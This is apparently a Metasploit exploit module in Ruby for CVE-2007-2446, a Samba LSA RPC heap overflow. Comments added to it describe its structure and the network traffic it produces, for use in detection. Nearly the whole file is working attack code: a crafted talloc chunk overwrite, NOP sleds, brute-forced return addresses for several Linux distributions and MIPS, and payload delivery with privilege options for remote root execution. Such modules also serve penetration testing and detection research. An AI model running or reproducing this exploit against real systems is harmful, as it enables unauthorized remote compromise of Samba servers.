Path: blob/master/modules/exploits/linux/samba/lsa_transnames_heap.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for CVE-2007-2446, the Samba lsa_io_trans_names heap overflow.
#
# Layout of this file:
#   * initialize      - module metadata, the per-distribution brute-force address
#                       ranges and the SMBPIPE option
#   * check           - banner fingerprint only ("Samba" present or not)
#   * brute_exploit   - one attempt per candidate 'Ret' address, driven by the
#                       Msf::Exploit::Brute mixin
#   * lsa_open_policy - LSA OpenPolicy request whose returned handle prefixes the
#                       LookupSids request
#
# Observable behaviour of one attempt (useful when writing detections): an SMB1
# session is opened (connect(versions: [1])), the LSARPC interface UUID is bound
# over the named pipe given by SMBPIPE, and opnum 0x0f is called with an entry
# count (num_entries2) larger than the declared array size (num_entries). The
# rescue clauses below treat "no reply" / pipe disconnect as the expected outcome,
# so a run shows up as repeated short-lived SMB1 sessions to the same pipe from a
# single client. Per the description, attempts fail when Samba's "log level" is
# above 2.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::DCERPC
  include Msf::Exploit::Remote::SMB::Client
  include Msf::Exploit::Brute

  # Module metadata. The Brute mixin iterates each target's 'Bruteforce' range
  # from 'Start' to 'Stop' in increments of 'Step', handing each value to
  # brute_exploit as target_addrs['Ret'].
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Samba lsa_io_trans_names Heap Overflow',
      'Description' => %q{
        This module triggers a heap overflow in the LSA RPC service
        of the Samba daemon. This module uses the TALLOC chunk overwrite
        method (credit Ramon and Adriano), which only works with Samba
        versions 3.0.21-3.0.24. Additionally, this module will not work
        when the Samba "log level" parameter is higher than "2".
      },
      'Author' =>
        [
          'Ramon de C Valle',
          'Adriano Lima <adriano[at]risesecurity.org>',
          'hdm'
        ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          ['CVE', '2007-2446'],
          ['OSVDB', '34699'],
        ],
      'Privileged' => true,
      'Payload' =>
        {
          'Space' => 1024, # no limit really
        },
      'Platform' => 'linux',
      'DefaultOptions' =>
        {
          'PrependSetresuid' => true,
          'PrependSetreuid' => true,
          'PrependSetuid' => true,
        },
      'Targets' =>
        [
          # Target 0 (default): a four-address range with a 1 KiB sled, stepped
          # one byte at a time.
          ['Linux vsyscall',
            {
              'Platform' => 'linux',
              'Arch' => [ ARCH_X86 ],
              'Nops' => 1024,
              'Bruteforce' =>
                {
                  'Start' => { 'Ret' => 0xffffe410 },
                  'Stop' => { 'Ret' => 0xffffe413 },
                  'Step' => 1,
                }
            }
          ],


          ##
          # Heap mappings observed by the contributors on each distribution;
          # the 'Start'/'Stop' values of the targets below are taken from them.
          # 08356000-0843d000 rwxp 08356000 00:00 0 (Debian) # KF
          # 80300000-8042f000 rw-p 80300000 00:00 0 (Gentoo) # hdm
          # b800f000-b80c9000 rwxp b800f000 00:00 0 (RHEL/CentOS) # Adriano/Ramon
          # 80365000-80424000 rwxp 80365000 00:00 0 (SUSE) # Adriano/Ramon
          # 8033c000-80412000 rwxp 00000000 00:00 0 (Slackware) # Adriano/Ramon
          # 08342000-08436000 rwxp 00000000 00:00 0 (Ubuntu) # hdm
          # 08270000-0837f000 rwxp 00000000 00:00 0 (SNAP) # Andrew
          #
          ##

          # Heap targets: a 64 KiB sled walked in 60 KiB steps, so consecutive
          # attempts overlap by 4 KiB.
          ['Linux Heap Brute Force (Debian/Ubuntu)',
            {
              'Platform' => 'linux',
              'Arch' => [ ARCH_X86 ],
              'Nops' => 64*1024,
              'Bruteforce' =>
                {
                  'Start' => { 'Ret' => 0x08352000 },
                  'Stop' => { 'Ret' => 0x0843d000 },
                  'Step' => 60*1024,

                }
            }
          ],

          ['Linux Heap Brute Force (Gentoo)',
            {
              'Platform' => 'linux',
              'Arch' => [ ARCH_X86 ],
              'Nops' => 64*1024,
              'Bruteforce' =>
                {
                  'Start' => { 'Ret' => 0x80310000 },
                  'Stop' => { 'Ret' => 0x8042f000 },
                  'Step' => 60*1024,

                }
            }
          ],



          ['Linux Heap Brute Force (Mandriva)',
            {
              'Platform' => 'linux',
              'Arch' => [ ARCH_X86 ],
              'Nops' => 64*1024,
              'Bruteforce' =>
                {
                  'Start' => { 'Ret' => 0x80380000 },
                  'Stop' => { 'Ret' => 0x8045b000 },
                  'Step' => 60*1024,

                }
            }
          ],

          ['Linux Heap Brute Force (RHEL/CentOS)',
            {
              'Platform' => 'linux',
              'Arch' => [ ARCH_X86 ],
              'Nops' => 64*1024,
              'Bruteforce' =>
                {
                  'Start' => { 'Ret' => 0xb800f000 },
                  'Stop' => { 'Ret' => 0xb80c9000 },
                  'Step' => 60*1024,

                }
            }
          ],

          ['Linux Heap Brute Force (SUSE)',
            {
              'Platform' => 'linux',
              'Arch' => [ ARCH_X86 ],
              'Nops' => 64*1024,
              'Bruteforce' =>
                {
                  'Start' => { 'Ret' => 0x80365000 },
                  'Stop' => { 'Ret' => 0x80424000 },
                  'Step' => 60*1024,

                }
            }
          ],

          ['Linux Heap Brute Force (Slackware)',
            {
              'Platform' => 'linux',
              'Arch' => [ ARCH_X86 ],
              'Nops' => 64*1024,
              'Bruteforce' =>
                {
                  'Start' => { 'Ret' => 0x8033c000 },
                  'Stop' => { 'Ret' => 0x80412000 },
                  'Step' => 60*1024,

                }
            }
          ],

          # Only non-x86 target; the 'Arch' value selects a big-endian MIPS
          # payload and sled while the rest of the request is built the same way.
          ['Linux Heap Brute Force (OpenWRT MIPS)',
            {
              'Platform' => 'linux',
              'Arch' => [ ARCH_MIPSBE ],
              'Nops' => 64*1024,
              'Bruteforce' =>
                {
                  'Start' => { 'Ret' => 0x55900000 },
                  'Stop' => { 'Ret' => 0x559c0000 },
                  'Step' => 60*1024,
                }
            }
          ],

          # Single fixed, recognisable 'Ret' value; presumably used to verify
          # the request layout in a debugger rather than to gain execution.
          ['DEBUG',
            {
              'Platform' => 'linux',
              'Arch' => [ ARCH_X86 ],
              'Nops' => 1024,
              'Bruteforce' =>
                {
                  'Start' => { 'Ret' => 0xAABBCCDD },
                  'Stop' => { 'Ret' => 0xAABBCCDD },
                  'Step' => 4,
                }
            }
          ],
        ],
      'DisclosureDate' => '2007-05-14',
      'DefaultTarget' => 0
    ))

    # Named pipe the LSARPC bind is made over; lower-cased in brute_exploit.
    register_options(
      [
        OptString.new('SMBPIPE', [ true, "The pipe name to use", 'LSARPC']),
      ])

    # connect() below always passes versions: [1], so the generic protocol
    # version option would be misleading and is removed.
    deregister_options('SMB::ProtocolVersion')
  end

  # Banner-only check: opens an SMB1 session, logs in, and reports Detected when
  # the peer's LM string mentions Samba at all. It does NOT verify the 3.0.21-3.0.24
  # range that the description says is required (that check only happens in
  # brute_exploit), so Detected here is weaker than "vulnerable".
  #
  # @return [Msf::Exploit::CheckCode] Detected, or Safe on any error or non-Samba banner
  def check
    begin
      connect(versions: [1])
      smb_login()
      disconnect()
      if (smb_peer_lm() =~ /Samba/i)
        return CheckCode::Detected
      else
        return CheckCode::Safe
      end
    # NOTE(review): rescuing ::Exception also swallows Interrupt and SystemExit
    # (and reports them as Safe); StandardError is the usual choice for
    # "any network/protocol error".
    rescue ::Exception
      return CheckCode::Safe
    end
  end

  # One exploitation attempt, invoked by the Brute mixin for each candidate
  # address in the selected target's range.
  #
  # @param target_addrs [Hash] current brute-force step; only 'Ret' is read here
  # @return [void] outcome is reported via print_* and the payload handler
  # @raise [Msf::Exploit::Failed] via fail_with when the banner is not Samba 3.0.21-24
  def brute_exploit(target_addrs)

    # The sled is built once and cached in @nops across all attempts of the run
    # (it can be 64 KiB for the heap targets). A target with 'Nops' => 0 gets an
    # empty sled.
    if(not @nops)
      if (target['Nops'] > 0)
        print_status("Creating nop sled....")
        @nops = make_nops(target['Nops'])
      else
        @nops = ''
      end

      # @nops = "\xcc" * (@nops.length)
    end

    print_status("Trying to exploit Samba with address 0x%.8x..." % target_addrs['Ret'])

    nops = @nops
    pipe = datastore['SMBPIPE'].downcase

    # Fresh SMB1 session per attempt; the previous one is torn down at the end
    # of this method.
    print_status("Connecting to the SMB service...")
    connect(versions: [1])
    smb_login()

    # Version gate, evaluated only on the first attempt of the run
    # (@checked_peerlm persists across brute_exploit calls). Anything outside
    # Samba 3.0.21-3.0.24 aborts the whole run.
    if ! @checked_peerlm
      if smb_peer_lm !~ /Samba 3\.0\.2[1234]/i
        fail_with(Failure::NoTarget, "This target is not a vulnerable Samba server (#{smb_peer_lm})")
      end
    end

    @checked_peerlm = true

    # NOTE(review): this writes into the module datastore, so the setting
    # persists after the run rather than applying to this bind only.
    datastore['DCERPC::fake_bind_multi'] = false

    # Bind the LSARPC interface (fixed UUID/version) over ncacn_np on the
    # configured pipe.
    handle = dcerpc_handle('12345778-1234-abcd-ef00-0123456789ab', '0.0', 'ncacn_np', ["\\#{pipe}"])
    print_status("Binding to #{handle} ...")
    dcerpc_bind(handle)
    print_status("Bound to #{handle} ...")

    # 256-byte filler with a 5-byte x86 relative jump (0xe9 + little-endian
    # rel32) patched in at offset 24; the displacement depends on the sled
    # length, which is why the sled must be fixed before this point.
    jumper = "P" * 256
    jumper[24, 5] = "\xe9" + [-5229-11-5-(nops.length/2)].pack('V')

    # Declared array size versus the count the server is asked to process;
    # the mismatch between these two values is what reaches the vulnerable
    # copy in lsa_io_trans_names.
    num_entries = 256
    num_entries2 = 272

    # first talloc_chunk
    # 16 bits align
    # 16 bits sid_name_use
    # 16 bits uni_str_len
    # 16 bits uni_max_len
    # 32 bits buffer
    # 32 bits domain_idx
    buf = (('A' * 16) * num_entries)

    # padding
    buf << 'A' * 8

    # TALLOC_MAGIC
    talloc_magic = "\x70\xec\x14\xe8"

    # second talloc_chunk header
    # Fake chunk header whose destructor field carries the candidate address;
    # the field order below mirrors the talloc_chunk struct of the affected
    # Samba versions (see the module description).
    buf << NDR.long(0) + NDR.long(0) # next, prev
    buf << NDR.long(0) + NDR.long(0) # parent, child
    buf << NDR.long(0) # refs
    buf << [target_addrs['Ret']].pack('V') # destructor
    buf << 'A' * 4 # name
    buf << 'A' * 4 # size
    buf << talloc_magic # flags
    buf << jumper

    # LookupSids request: the 20-byte policy handle returned by OpenPolicy,
    # then the NDR fields, the crafted buffer, the sled and the payload.
    stub = lsa_open_policy(dcerpc)

    stub << NDR.long(0) # num_entries
    stub << NDR.long(0) # ptr_sid_enum
    stub << NDR.long(num_entries) # num_entries
    stub << NDR.long(0x20004) # ptr_trans_names
    stub << NDR.long(num_entries2) # num_entries2
    stub << buf
    stub << nops
    stub << payload.encoded

    print_status("Calling the vulnerable function...")

    # No reply, EOF or a pipe disconnect is the expected result of a successful
    # overflow (the smbd child dies); a DCERPC fault means the server rejected
    # the request, which the authors take as a sign it is patched.
    begin
      # LsarLookupSids
      dcerpc.call(0x0f, stub)
    rescue Rex::Proto::DCERPC::Exceptions::NoResponse, Rex::Proto::SMB::Exceptions::NoReply, ::EOFError
      print_status('Server did not respond, this is expected')
    rescue Rex::Proto::DCERPC::Exceptions::Fault
      print_error('Server is most likely patched...')
    rescue => e
      if e.to_s =~ /STATUS_PIPE_DISCONNECTED/
        print_status('Server disconnected, this is expected')
      else
        print_error("Error: #{e.class}: #{e}")
      end
    end

    # Give the payload handler a chance to pick up a session, then close the
    # SMB connection so the next attempt starts clean.
    handler
    disconnect
  end

  # Issues an LSA OpenPolicy request (opnum 6) with the object attributes and
  # QOS block laid out below, and returns the first 20 bytes of the response
  # stub, i.e. the policy handle that LookupSids expects at the front of its
  # request.
  #
  # @param dcerpc [Object] bound DCERPC client (the module's dcerpc accessor)
  # @param server [String] server name marshalled as a Unicode string
  # @return [String] 20-byte policy handle from the response
  def lsa_open_policy(dcerpc, server="\\")
    stubdata =
      # Server
      NDR.uwstring(server) +
      # Object Attributes
      NDR.long(24) + # SIZE
      NDR.long(0) + # LSPTR
      NDR.long(0) + # NAME
      NDR.long(0) + # ATTRS
      NDR.long(0) + # SEC DES
      # LSA QOS PTR
      NDR.long(1) + # Referent
      NDR.long(12) + # Length
      NDR.long(2) + # Impersonation
      NDR.long(1) + # Context Tracking
      NDR.long(0) + # Effective Only
      # Access Mask
      NDR.long(0x02000000)

    # NOTE(review): res is never read; the handle is taken from last_response
    # below, so this local could be dropped.
    res = dcerpc.call(6, stubdata)

    dcerpc.last_response.stub_data[0,20]
  end
end

